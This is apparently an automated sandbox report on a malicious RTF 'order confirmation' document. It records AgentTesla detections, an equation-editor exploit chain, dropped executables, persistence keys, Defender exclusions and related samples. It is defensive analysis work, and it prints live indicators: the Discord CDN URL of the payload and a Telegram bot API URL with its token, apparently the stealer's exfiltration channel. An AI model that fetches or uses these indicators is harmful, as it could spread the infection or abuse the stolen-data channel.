                      Source: Yara matchFile source: 00000027.00000002.2165424688.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.2169471559.0000000002B11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2180537277.0000000004783000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: srt.exe PID: 2692, type: MEMORY
                      Source: Yara matchFile source: 38.2.svchost.exe.4053840.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4783840.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.47c8660.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.svchost.exe.4098660.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.4138660.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.47c8660.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.40f3840.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.47c8660.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.4138660.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.47c8660.9.unpack, type: UNPACKEDPE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: number of queries: 2505
                      Source: Yara matchFile source: 00000027.00000002.2169471559.0000000002B11000.00000004.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000026.00000002.2211744541.0000000004053000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2182891401.0000000004783000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.2165424688.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2180537277.0000000004783000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 38.2.svchost.exe.4053840.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4783840.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.47c8660.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.svchost.exe.4098660.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.4138660.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.47c8660.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.40f3840.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.47c8660.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.4138660.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.400000.0.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000026.00000002.2211744541.0000000004053000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2182891401.0000000004783000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.2165424688.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.2169471559.0000000002B11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2180537277.0000000004783000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: srt.exe PID: 2692, type: MEMORY
                      Source: Yara matchFile source: 38.2.svchost.exe.4053840.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.4783840.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.47c8660.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.svchost.exe.4098660.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.4138660.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.47c8660.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.40f3840.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.47c8660.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.srt.exe.4138660.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 39.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.47c8660.9.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsCommand and Scripting Interpreter1Startup Items1Startup Items1Masquerading221OS Credential DumpingSecurity Software Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution13Registry Run Keys / Startup Folder221Access Token Manipulation1Disable or Modify Tools11LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Process Injection111Virtualization/Sandbox Evasion121Security Account ManagerVirtualization/Sandbox Evasion121SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder221Access Token Manipulation1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection111LSA SecretsFile and Directory Discovery12SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Information Discovery14VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsTimestomp1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 425839 Sample: order-confirmation.doc__.rtf Startdate: 27/05/2021 Architecture: WINDOWS Score: 100 56 Found malware configuration 2->56 58 Antivirus / Scanner detection for submitted sample 2->58 60 Sigma detected: Powershell adding suspicious path to exclusion list 2->60 62 13 other signatures 2->62 8 EQNEDT32.EXE 1 2->8         started        13 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe 2->13         started        15 svchost.exe 2->15         started        17 WINWORD.EXE 291 21 2->17         started        process3 dnsIp4 54 cdn.discordapp.com 162.159.130.233, 443, 49167, 49168 CLOUDFLARENETUS United States 8->54 52 C:\Users\user\AppData\Roaming\srt.exe, PE32 8->52 dropped 72 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->72 19 srt.exe 5 4 8->19         started        74 Adds a directory exclusion to Windows Defender 13->74 76 Injects a PE file into a foreign processes 13->76 23 powershell.exe 13->23         started        25 powershell.exe 13->25         started        27 powershell.exe 13->27         started        29 powershell.exe 13->29         started        78 Machine Learning detection for dropped file 15->78 80 Tries to delay execution (extensive OutputDebugStringW loop) 15->80 file5 signatures6 process7 file8 48 C:\Windows\Resources\Themes\...\svchost.exe, PE32 19->48 dropped 50 69vdz0d62eh81022f8...A2mdw7IdFa8a78d.exe, PE32 19->50 dropped 64 Machine Learning detection for dropped file 19->64 66 Drops PE files to the startup folder 19->66 68 Creates an autostart registry key pointing to binary in C:\Windows 19->68 70 3 other signatures 19->70 31 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe 1 19->31         started        34 powershell.exe 7 19->34         started        36 powershell.exe 7 19->36         started        38 7 other processes 19->38 signatures9 process10 signatures11 82 Adds a directory exclusion to Windows Defender 31->82 84 Injects a PE file into a foreign processes 31->84 40 powershell.exe 31->40         started        42 powershell.exe 31->42         started        44 powershell.exe 31->44         started        46 2 other processes 31->46 process12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      order-confirmation.doc__.rtf40%ReversingLabsDocument-RTF.Trojan.Heuristic
                      order-confirmation.doc__.rtf100%AviraHEUR/Rtf.Malformed

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\srt.exe100%Joe Sandbox ML
                      C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe100%Joe Sandbox ML

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      cdn.discordapp.com
                      		162.159.130.233
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exefalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checksrt.exe, 00000003.00000002.2190088879.00000000082C7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103393408.0000000002D17000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2110147497.0000000002CB7000.00000002.00000001.sdmpfalse
                            		high
                            http://www.windows.com/pctv.powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmpfalse
                              		high
                              http://investor.msn.comsrt.exe, 00000003.00000002.2187112009.00000000080E0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmpfalse
                                		high
                                http://www.msnbc.com/news/ticker.txtsrt.exe, 00000003.00000002.2187112009.00000000080E0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.icra.org/vocabulary/.srt.exe, 00000003.00000002.2190088879.00000000082C7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103393408.0000000002D17000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2110147497.0000000002CB7000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.srt.exe, 00000003.00000002.2184970130.0000000007900000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2100315678.00000000021A0000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000004.00000003.2093705845.0000000000701000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.2095242575.00000000002DB000.00000004.00000001.sdmpfalse
                                      		high
                                      https://api.telegram.org/bot1870790471:AAFpD5zuAlCeqAqJnBFTcvC5WkaPoWtoQ9c/srt.exe, 00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmpfalse
                                        		high
                                        http://investor.msn.com/srt.exe, 00000003.00000002.2187112009.00000000080E0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.piriform.com/ccleanerpowershell.exe, 00000004.00000003.2093705845.0000000000701000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.2095242575.00000000002DB000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.%s.comPAsrt.exe, 00000003.00000002.2184970130.0000000007900000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2100315678.00000000021A0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		low
                                            http://windowsmedia.com/redir/services.asp?WMPFriendly=truesrt.exe, 00000003.00000002.2190088879.00000000082C7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103393408.0000000002D17000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2110147497.0000000002CB7000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.hotmail.com/oesrt.exe, 00000003.00000002.2187112009.00000000080E0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesrt.exe, 00000003.00000002.2184172162.0000000006901000.00000004.00000001.sdmpfalse
                                                		high
                                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipsrt.exe, 00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                162.159.130.233
                                                		cdn.discordapp.comUnited States
                                                		13335CLOUDFLARENETUSfalse

                                                General Information

                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                Analysis ID:425839
                                                Start date:27.05.2021
                                                Start time:21:41:34
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 18m 33s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:order-confirmation.doc__.rtf
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                Number of analysed new started processes analysed:40
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.adwa.expl.evad.winRTF@57/24@2/1
                                                EGA Information:Failed
                                                HDC Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 98%
                                                • Number of executed functions: 922
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .rtf
                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                • Attach to Office via COM
                                                • Scroll down
                                                • Close Viewer
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                21:42:36API Interceptor28x Sleep call for process: EQNEDT32.EXE modified
                                                21:42:39API Interceptor225x Sleep call for process: srt.exe modified
                                                21:42:44API Interceptor277x Sleep call for process: powershell.exe modified
                                                21:42:44AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                21:42:48API Interceptor258x Sleep call for process: 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe modified
                                                21:42:58AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
                                                21:43:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
                                                21:43:12API Interceptor114x Sleep call for process: svchost.exe modified
                                                21:43:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe
                                                21:43:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                162.159.130.233Order Confirmation.docGet hashmaliciousBrowse
                                                • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                                cfe14e87_by_Libranalysis.rtfGet hashmaliciousBrowse
                                                • cdn.discordapp.com/attachments/520353354304585730/839557970173100102/ew.exe
                                                SkKcQaHEB8.exeGet hashmaliciousBrowse
                                                • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                                P20200107.DOCGet hashmaliciousBrowse
                                                • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                                FBRO ORDER SHEET - YATSAL SUMMER 2021.exeGet hashmaliciousBrowse
                                                • cdn.discordapp.com/attachments/832005460982235229/836405556838924308/usd.exe
                                                SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                                • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                                SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                                • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                                G019 & G022 SPEC SHEET.exeGet hashmaliciousBrowse
                                                • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                                Marking Machine 30W Specification.exeGet hashmaliciousBrowse
                                                • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                                2021 RFQ Products Required.docGet hashmaliciousBrowse
                                                • cdn.discordapp.com/attachments/821511904769998921/821511945881911306/panam.exe
                                                Company Reference1.docGet hashmaliciousBrowse
                                                • cdn.discordapp.com/attachments/819949436054536222/820935251337281546/nbalax.exe
                                                PAY SLIP.docGet hashmaliciousBrowse
                                                • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
                                                SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtfGet hashmaliciousBrowse
                                                • cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
                                                part1.rtfGet hashmaliciousBrowse
                                                • cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                cdn.discordapp.comOrder Confirmation.docGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                INVOICE.exeGet hashmaliciousBrowse
                                                • 162.159.135.233
                                                INVOICE.exeGet hashmaliciousBrowse
                                                • 162.159.134.233
                                                T2qL1jOO04.exeGet hashmaliciousBrowse
                                                • 162.159.129.233
                                                Payment Advice Reference No SWT005262021.exeGet hashmaliciousBrowse
                                                • 162.159.133.233
                                                QUjeZ56Irv.exeGet hashmaliciousBrowse
                                                • 162.159.129.233
                                                Ordine no. 20210527.docGet hashmaliciousBrowse
                                                • 162.159.129.233
                                                aydrxnitvo.exeGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                PURCHASE ORDER LIST.exeGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                Purchase Orders - Foreign_000000000088707.exeGet hashmaliciousBrowse
                                                • 162.159.135.233
                                                CamScanner 26.05.2021 3.05.exeGet hashmaliciousBrowse
                                                • 162.159.133.233
                                                DHL_887343.exeGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                INV.exeGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                IMG_0127_06_922.exeGet hashmaliciousBrowse
                                                • 162.159.133.233
                                                T89947386-Confirm-20210525-190086-Email-8799677.exeGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                PL_0077_065_3.exeGet hashmaliciousBrowse
                                                • 162.159.129.233
                                                DLP_10578562.exeGet hashmaliciousBrowse
                                                • 162.159.129.233
                                                Product Details.exeGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                Statement SKBMT 091818.exeGet hashmaliciousBrowse
                                                • 162.159.129.233
                                                products order pdf .exeGet hashmaliciousBrowse
                                                • 162.159.133.233

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                CLOUDFLARENETUSOrder Confirmation.docGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                #U266c Voice_Audio_845021.htmGet hashmaliciousBrowse
                                                • 104.18.10.207
                                                E0O4iRjJyy.exeGet hashmaliciousBrowse
                                                • 172.67.188.154
                                                INVOICE.exeGet hashmaliciousBrowse
                                                • 162.159.135.233
                                                INVOICE.exeGet hashmaliciousBrowse
                                                • 162.159.134.233
                                                8pMF3KenX9.exeGet hashmaliciousBrowse
                                                • 172.67.145.48
                                                T2qL1jOO04.exeGet hashmaliciousBrowse
                                                • 172.67.186.79
                                                f2fR2CiaRu.exeGet hashmaliciousBrowse
                                                • 104.21.62.88
                                                8nAxSn6IsV.exeGet hashmaliciousBrowse
                                                • 1.1.1.1
                                                VM.HTMLGet hashmaliciousBrowse
                                                • 104.18.10.207
                                                3107790.dat.dllGet hashmaliciousBrowse
                                                • 104.20.185.68
                                                #U266c Voice_Audio_845021.htmGet hashmaliciousBrowse
                                                • 104.18.11.207
                                                Wynnlasvegas_Scan_item.htmGet hashmaliciousBrowse
                                                • 104.16.19.94
                                                72c8db337dc04e4bdb1c840e81a4ecee5b1bacd328bbb.dllGet hashmaliciousBrowse
                                                • 172.67.142.43
                                                71bc262977cf6112541d871c3946ab6112d64297ef5f8.dllGet hashmaliciousBrowse
                                                • 104.21.87.66
                                                Payment Advice Reference No SWT005262021.exeGet hashmaliciousBrowse
                                                • 162.159.133.233
                                                39dde7049b772424639030d139edf59fb1f227604c6a3.dllGet hashmaliciousBrowse
                                                • 172.67.142.43
                                                75b228968195fe08af23cefc88ec6d35a33347c4774ac.dllGet hashmaliciousBrowse
                                                • 172.67.142.43
                                                Sait_Message.htmGet hashmaliciousBrowse
                                                • 104.16.18.94
                                                USU(1).exeGet hashmaliciousBrowse
                                                • 172.65.227.72

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                05af1f5ca1b87cc9cc9b25185115607dOrder Confirmation.docGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                RgWKJzipph.docGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                purchase inquiry 25.5.2021.doc__.rtfGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                42bceb60_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                a9afdac1_by_Libranalysis.docxGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                2421c4d0_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                b4b13a17_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                purchase order.docGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                Unconfirmed 630743.docxGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                SWIFT_Scanned_Copy.docxGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                remittance details.docxGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                130985cf_by_Libranalysis.rtfGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                Payoff - 2021AT0514.docGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                Payment Slip.docxGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                4b092c1e_by_Libranalysis.docxGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                eb57884e_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                79cc8c05_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                Tender Overview 10052021.docGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                bb37e159_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                • 162.159.130.233
                                                471e3984_by_Libranalysis.docxGet hashmaliciousBrowse
                                                • 162.159.130.233

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                C:\Users\user\AppData\Roaming\srt.exeOrder Confirmation.docGet hashmaliciousBrowse
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeOrder Confirmation.docGet hashmaliciousBrowse
                                                    C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeOrder Confirmation.docGet hashmaliciousBrowse

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE4C9C3-349E-46EF-BF24-C3A751787722}.tmp
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):0.05390218305374581
                                                      Encrypted:false
                                                      SSDEEP:3:ol3lYdn:4Wn
                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
